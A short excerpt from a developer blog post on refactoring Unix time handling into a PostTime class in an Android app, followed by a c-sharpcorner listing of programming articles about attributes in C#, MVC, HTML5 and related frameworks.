Why would a Story need to know UnixTime?! The correct answer is, "It doesn't". We've facilitated this by having a PostTime class with the Single Responsibility of knowing how to take in the UnixTime and display it later. I'm noticing there's some common behavior between classes where a MixIn approach might simplify things. I don't have enough examples demonstrating where it would make an improvement, which means that change must be held off. While not the longest in the series so far; I feel I've learned the most from this one. I'm really pleased about that.
https://quinngil.com/2017/03/12/vbm-on-android-top-stories-full-data/
CC-MAIN-2020-05
refinedweb
2,232
76.01
(7) Vijay Prativadi(3) Abhimanyu K Vatsa(2) Ashish Shukla(2) Mahesh Chand(2) Puran Mehra(2) Sateesh Arveti(2) Shridhar Sharma(2) Debasis Saha(2) Amit Mishra(2) Ankur Mistry(2) Mukesh Kumar(2) Ethan Millar(1) Vijayaragavan S(1) Raj Kumar(1) Akshay Patel(1) Rion Williams(1) Kamlesh Bhor(1) Anubhav Chaudhary(1) Ankur Mishra(1) Steven Woolston(1) Harpreet Singh(1) Sourav Kayal(1) Sandeep Sharma(1) Vidya Vrat Agarwal(1) Mihir Pathak(1) Adarsh Acharya(1) Charles Petzold(1) Edmund H Smith(1) Ismail Pazarbasi(1) Rajadurai P(1) Mike Gold(1) Menaka Priyadharshini B(1) Nilesh Jadav(1) Deepak Kumar Choudhary(1) Abhijeet Singh(1) Amit Choudhary(1) Deepak Dutta(1) Amit Maheshwari(1) Suchit Khanna(1) Divyesh Shah(1) Patrick Smacchia(1) Jignesh Trivedi(1) Dhruvin Shah(1) Pankaj Sapkal(1) Madhanmohan Devarajan(1) Rathrola Prem Kumar (1) Santosh Kumar Adidawarpu(1) Debendra Dash(1) Bikesh Srivastava(1) Fabio Silva Lima(1) Akshay Phadke(1) Vithal Wadje(1) Anoop Kumar Sharma(1) Sachin Kalia(1) Mannan Bahelim(1) Suraj Pant(1) Pankaj Kumar Choudhary(1) Saillesh Pawar(1) Ehsan Sajjad(1) Shakti Saxena(1) Robert Snyder(1) Priyaranjan K S(1) Srinivas Vadepally(1) Sibeesh Venu(1) Akhil Mittal(1) Bruno Leonardo Michels(1) Vivek Tripathi(1) Shresthi Jaiswal(1) Rangesh Sripathi(1) Shantha Kumar T(1) Sanjay Kumar(1) Prasham Sabadra(1) Pranay Rana(1) Tom Mohan(1) Ajay Yadav(1) Gaurav Kumar(1) Bhushan Gawale(1) Manish Kumar Choudhary(1) Pramod Thakur(1) Rahul Saxena(1) Abhishek Singh(1) Resources No resource found Difference Between Spring Transaction Propagation Attributes In Java Development Dec 06, 2016. In this article, you will learn about the difference between Spring Transaction Propagation attributes in Java Development. Retrieving Face Attributes Using Cognitive Service Face API In UWP With Azure, XAML And C# Oct 21, 2016. In this article, you will learn about retrieving face attributes using cognitive service face API in UWP, with Azure, XAML, and C#. Get Image Attributes using Cognitive Services face API in WPF Oct 04, 2016. In this article you will learn how to get the image attributes like Age, Gender using Cognitive Services face API in WPF. All About API: HTTP Verb Attributes - Part Four May 09, 2016. In this article you will learn about HTTP Verb Attributes. Applying Conditional Attributes in ASP.NET MVC Views Nov 13, 2015. In this article you will learn applying Conditional Attributes in ASP.NET MVC Views. Understanding Attributes In C# Oct 16, 2015. In this article we will learn about attributes in C#. Attribute is a class used to give additional declarative information for the class, method, property, indexer, etc. Get Attributes of Element in AngularJS Just Like jQuery Jul 22, 2015. This article shows how to get the attributes of an element in AngularJS just as in jQuery. jQuery Attributes Basics Jul 05, 2015. This article explains the basics of jQuery attributes. Custom MVC Attributes #wdwdnet Apr 21, 2015. The ASP.Net Membership provider has MVC attributes that we can use to decorate Actions and set permissions. This article will describe how to extend that. Useful Attributes of MVC: Part 1 Mar 17, 2015. In this article we will learn about some useful attributes that can be used in MVC applications. Understand WCF: Part 10: Attributes of DataContract and DataMember Nov 03, 2013. In this article we will see how to add attributes to a Data Contract and Data Member. Servlet Attributes in Java Sep 25, 2013. In this article we discuss servlet attributes in java. NetBeans IDE is used for sample example. Custom Data Annotations or Custom Validation Attributes in MVC Jul 15, 2013. In this post you will learn how to create custom data annotation in MVC. MVC framework has great extensibility feature and because of this we can create our own customized data annotation attributes. Using Attributes With C# .NET Jul 07, 2013. Here you‘ll see how to define attributes on various items within your program. Custom Attributes in .NET Mar 31, 2013. In this article we will see how to attach metadata to a class using custom attributes and access it at runtime using reflection. Reading Assembly attributes in VB.NET Nov 10, 2012. This article allows you to read the assembly attributes information using .NET. The information store in AssemblyInfo files like Title, Description, copyright, Trade mark can be read using reflection and assembly namespace. Delete All XML Elements and Attributes Nodes Oct 17, 2012. Today, in this article let’s play around with one of the interesting and most useful concepts in XML in C#. Let's Play Around With Different Attributes and Input Types in HTML 5 Feb 25, 2012. Today, in this article let’s dig out by learning another new concept in HTML 5. Once implemented, this concept offers a better look & feel for the application and development becomes more light-weight. Create a File Attributes Changer / Locker in a C# Windows Application Jan 28, 2012. In this project I have created not a file locker but a user friendly file attributes changer.. Reading XML Attributes using LINQ to XML in Silverlight Nov 29, 2010. This code snippet demonstrates how to load an XML file and reads its nodes and their attributes in a Silverlight application using LINQ to XML. Reflection and Attributes in C# Sep 03, 2010. Attributes are attached to program entities such as types and methods to provide information about the entity at runtime. In this article, we will explore attributes using reflection in C#. LevelFinal and Exclusive Attributes in C# Mar 16, 2010. In this article I will explain you about LevelFinal and Exclusive Attributes in C# . Image Attributes and the ImageAttributes Class in GDI+ Mar 11, 2010. In this article I will explain about Image Attributes and the ImageAttributes Class in GDI+. Generate SQL Statements With Objects, Attributes and Reflection Jun 12, 2007. Create a SQL Command with SQL Statement and Parameters dynamically. Comparing Conditional Attributes in C/C++ versus C# Apr 09, 2005. This article compares conditional attibuting in C/C++ and C#. Using Attributes in C# Sep 14, 2001. This article shows how to create custom attribute classes, use them in code, and query them. Creating and Using Custom Attributes in C# Feb 27, 2000. Attributes are classes that allow you to add additional information to elements of your class structure. Overview Of C# Attributes Jun 10, 2017. Overview Of C# Attributes. Attributes Of Induction Motor By Cloud Computing Aug 25, 2016. In this article you, will learn, how to turn Induction Motor on or off by Cloud Computing, using Internet of Things. Attributes In C# Oct 16, 2015. In this article we will learn about attributes in C#. Attributes are used to associate some important instruction or information regarding methods, properties or types. Attributes in C# Aug 20, 2015. In this article you will learn about Attributes in the C# language. Methods/Attributes in Backbone Model: Part 4 Jan 01, 2015. In this article we will be dealing with the terms related to the Backbone Model. Some HTML5 Global Attributes Feb 19, 2014. In this article we will learn some HTML5 global attributes. Enum Operations For Name Value Attributes Jun 10, 2013. We'll see in this article how to manipulate the values, names and attributes using Reflection at run time. HTML5 Canvas Composition and Its Attributes Mar 21, 2013. This article describes the implementation and use of Composition and its Attributes in HTML5. HTML5 New Form Attributes-Part 5 Feb 28, 2013. In this article I describe the implementation and use of some more form attributes in HTML5. HTML5 New Form Attributes-Part 6 Feb 28, 2013. In this article I am going to describes the implementation and use of some more new form attributes in HTML5. New HTML5 Form Attributes-Part 2 Feb 27, 2013. In this article I describe the implementation and use of the Form Attribute, Formaction Attribute and Formenctype Attribute of HTML5. HTML5 New Form Attributes-Part 3 Feb 27, 2013. In this article I describe the implementation and use of some more form attributes of HTML5. HTML5 New Form Attributes-Part 4 Feb 27, 2013. In this article I describe the implementation and use of some new form attributes in HTML5. HTML5 Form Attributes: Part 1 Feb 26, 2013. In this article I describe the implementation and use of HTML5 Form Attributes.. MVC Bind Attributes Oct 16, 2012.. Attributes in JQuery Nov 13, 2011. Here we will discuss about the attributes used in JQuery, In the JQuery API there are attributes which contains many methods. Attributes in C# Jun 08, 2011. In this series we will see the usage of “Attribute” with the help of some examples and creation of our own custom attributes to be used in a sample use case.. Attributes in C# Nov 24, 2009. In this article I will explain about attributes in C#. Attributes in C# Feb 20, 2006. In this artilcle, we will see what the attributes are and why should we use the attributes in our applications? Custom People Search Page With Phone Number Attribute In SharePoint Online Aug 28, 2017. We have a requirement from one of our clients. They want to modify the “peopleresults.aspx” page which is the default People Search Page provided by SharePoint OOTB.. JavaScript For Querying An Entity And Updating Attribute Values In Form Jun 20, 2017. In this article, you will learn about JavaScript for querying an Entity and updating attribute values in form. Attribute Directives In Angular 2 - Part Twelve May 15, 2017. In this article, you will learn about Attribute Directives in an Angular 2. Angular 2 Custom Attribute To Secure The HTTP Requests And To Show/Hide Spinner During The Service Call Apr 19, 2017. Angular 2 Custom Attribute To Secure The HTTP Requests And To Show/Hide Spinner During The Service Call. Creating Your Own Validation Attribute In MVC And Web API 2.0 Apr 11, 2017. In this article, we will learn how to create your own validation attribute in MVC and WebAPI 2.0. Attribute Based Routing In ASP.NET Web API And MVC 4 Mar 09, 2017. In this article, we will learn how to implement Attribute Routing in WebAPI 1. AngularJS 2.0 From The Beginning - Attribute Directives - Day Six Jan 07, 2017. In this article, you will learn about the attribute directives in AngularJS 2.0. MVC Data Annotations And HtmlHelpers For KnockoutJS Dec 20, 2016. In this article, I will show you how to create data annotations for MVC models and combine that with HtmlHelpers to render all attributes of KnockoutJS in input fields. Practical Approach To ASP.NET Web Services - Part Four - Web Method Attribute Properties Dec 06, 2016. In this article, you will learn about Web Method Attribute Properties in ASP.NET Web Services. Remote Validation In ASP.NET MVC Oct 28, 2016. In this article, we will learn about the Remote Validation attributes of ASP.NET MVC. HandleError Action Filter In ASP.NET MVC Jul 27, 2016. In this article, you will learn how to handle an error using HandleError Action Filter in ASP.NET MVC. Properties Of WebMethod Attribute In Web Service - Part Four Jun 14, 2016. In this article, you will learn about properties of WebMethod attribute in a Web Service.. Create Custom Code Snippet In Visual Studio 2015 - Part Three Mar 09, 2016. In this article we will go further and look into elements and attributes available for extending a code snippet. This is part three of the article series. MVC Output Cache And Cache Profiling Feb 22, 2016. In this post we will discuss one of the easiest ways to cache an output in MVC and output cache attributes.. Debugger Display Attribute In Visual Studio Nov 27, 2015. In this article you will learn Debugger Display Attribute in Visual Studio. Choose Attribute Routing Instead Of Convention Based Routing In ASP.NET MVC Nov 23, 2015. In this article, I will try to demonstrate you about when to choose Convention Based Routing and Attribute Routing. NUnit's Test Case Source Nov 08, 2015. In this article I will show when and how to use NUnit’s TestCaseSourceAttribute and why it is an unsung hero.. RESTful Day #4: Custom URL Re-Writing/Routing Using Attribute Routes in MVC 4 Web APIs Jun 01, 2015. This article explains Custom URL Re-Writing/Routing using Attribute Routes in MVC 4 Web APIs. Using Data Annotations to Validate Models in .NET May 29, 2015. In this article you will learn how to create model validation using built-in attributes. Data Annotation Attribute On Code First Approach May 16, 2015. This article explains the Data Annotation Attribute of the Code First Approach. Index Attribute Using Entity Framework May 12, 2015. This article shows how to access a SQL Server database with the Entity Framework Code First approach and how to create an index. HTML For Beginners: Part 3 Apr 11, 2015. In this article we will learn HTML Attributes. KnownType Attribute in WCF Mar 29, 2015. This article explains how to use a known type in WCF and provides a basic understanding of WCF and DataContracts as the prerequisites. Introduction to AngularJS in SharePoint 2013 Mar 22, 2015. This article introduces AngularJS in SharePoint 2013. Model Binding in ASP.Net 4.5 Mar 10, 2015. This article explains how to use Model Binding in ASP.Net 4.5. Duplicate Web Part Issue is Resolved in Sharepoint 2013 Mar 07, 2015. Today something regarding one of the new feature of SharePoint 13. There is new attribute “ReplaceContent=TRUE” to the <File> element in <Module>. Complex Custom Validation Attribute Specific to Entity Mar 07, 2015. In this article you will learn about the Complex Custom Validation Attribute specific to an Entity. ASP.NET MVC : Handle Session Expire Using Custom Attribute Feb 24, 2015. In this article you will learn how to handle a Session Expire using a Custom Attribute in ASP.NET MVC. Dynamic Programming Feb 11, 2015. This article examines the role and importance of attributes that are an identical aspect of dynamic programming. Basics of Input Control in Android : Part 2 Spinners Feb 11, 2015. This article illustrates the basics of spinners as a part of Input controls. Working with Backbone.Collection : Part 6 Jan 14, 2015. In this article we will be dealing with methods and attributes provided by the Backbone collection. Generate Dropdownlist With Custom Attribute Column Using Kendo UI and jQuery Jan 13, 2015. In this article you will learn how to Generate Dropdownlist with Custom Attribute Column using Kendo UI and Jquery. Attribute Based Routing in ASP.Net MVC 5 Jan 06, 2015. This article describes attribute based routing, a new feature introduced in ASP.NET MVC 5. Create a Custom Remote Attribute in MVC Jan 02, 2015. This article explains how to create a custom remote attribute in MVC. We use the procedure in this article to create a custom attribute in MVC. KnownType Attribute in WCF: Part 6 Dec 04, 2014. In this article we learn what the KnownType attribute is in WCF and how to implement it. MVC 4: Custom Validation Data Annotation Attribute Nov 18, 2014. This article explains how to use the Custom Data Annotations Attribute in MVC 4. Type Attribute in WCF Nov 17, 2014. In this article you will learn about WCF Services and various contracts with the framework. About Attributes. File APIs for .NET Aspose are the market leader of .NET APIs for file business formats – natively work with DOCX, XLSX, PPT, PDF, MSG, MPP, images formats and many more!
http://www.c-sharpcorner.com/tags/Attributes
CC-MAIN-2017-39
refinedweb
2,608
67.25